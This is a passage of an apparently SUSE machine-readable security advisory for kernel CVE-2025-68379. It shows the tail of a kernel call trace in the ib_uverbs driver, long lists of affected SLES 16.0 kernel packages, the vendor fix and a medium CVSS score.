uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
